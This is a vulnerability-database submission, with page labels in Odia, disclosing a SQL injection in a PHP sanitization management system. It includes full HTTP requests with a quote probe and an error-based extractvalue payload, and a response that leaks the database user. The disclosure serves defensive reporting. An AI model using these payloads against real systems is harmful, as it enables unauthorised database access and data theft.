ଜମା କରନ୍ତୁ #50579: sourcecodester Sanitization-Management-System SQL injectionସୂଚନା

ଶୀର୍ଷକ	sourcecodester Sanitization-Management-System SQL injection
ବର୍ଣ୍ଣନା	A vulnerability classified as critical has been discovered in SMS. This affects an unknown part of the file Master.php. Manipulation on parameter ID results in sql injection #1, visit cms #2，Use burp to grab request packets #3，I found that there is sql injection in name=”id“ in the form submitted by path /php-sms/classes/Master.php?f=save quote request and return packets ----------------------------------------------------------------------------------------------------------- POST /php-sms/classes/Master.php?f=save_service HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="100" Accept: application/json, text/javascript, /; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycKqminYBwcgy9RHs X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 sec-ch-ua-platform: "Windows" Accept-Language: en-US Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-sms/admin/?page=services/manage_service Connection: keep-alive Cookie: PHPSESSID=u16ltkbk2uotkvrd3duoo0h1rj Content-Length: 718 ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="id" ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="name" 1' ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="description" 555 ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="files"; filename="image.jpg" Content-Type: image/jpeg 1 ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="status" 0 ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="img"; filename="zip.zip" Content-Type: application/x-zip-compressed 1 ------WebKitFormBoundarycKqminYBwcgy9RHs-- ----------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Wed, 02 Nov 2022 09:11:32 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 X-Powered-By: PHP/7.4.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 349 <br /> <b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>E:\phpstudy_pro\WWW\php-sms\classes\Master.php</b> on line <b>48</b><br /> {"status":"failed","error":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and delete_flag = 0' at line 1"} ------------------------------------------------------------------------------------- POST /php-sms/classes/Master.php?f=save_service HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="100" Accept: application/json, text/javascript, /; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycKqminYBwcgy9RHs X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 sec-ch-ua-platform: "Windows" Accept-Language: en-US Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-sms/admin/?page=services/manage_service Connection: keep-alive Cookie: PHPSESSID=u16ltkbk2uotkvrd3duoo0h1rj Content-Length: 778 ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="id" ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="name" 1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))); -- ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="description" 555 ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="files"; filename="image.jpg" Content-Type: image/jpeg 1 ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="status" 0 ------WebKitFormBoundarycKqminYBwcgy9RHs Content-Disposition: form-data; name="img"; filename="zip.zip" Content-Type: application/x-zip-compressed 1 ------WebKitFormBoundarycKqminYBwcgy9RHs-- ------------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Wed, 02 Nov 2022 09:15:07 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 X-Powered-By: PHP/7.4.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 220 <br /> <b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>E:\phpstudy_pro\WWW\php-sms\classes\Master.php</b> on line <b>48</b><br /> {"status":"failed","error":"XPATH syntax error: '~root@localhost~'"}
ଉତ୍ସ	⚠️ https://github.com/x9AD8/Sanitization-Management-System/blob/main/README.md
ଉପଭୋକ୍ତା	uchihashow (UID 34954)
ଦାଖଲ	11/02/2022 10:30 AM (3 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର	11/05/2022 09:46 AM (3 days later)
ସ୍ଥିତି	ଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି	213012 [SourceCodester Sanitization Management System Master.php?f=save_quote ID SQL ଇଞ୍ଜେକ୍ସନ]
ପଏଣ୍ଟ	20

◂ ପଛକୁ ସମୀକ୍ଷା ଆହୁରି ଦୂରରେ ▸

Do you know our Splunk app?

Download it now for free!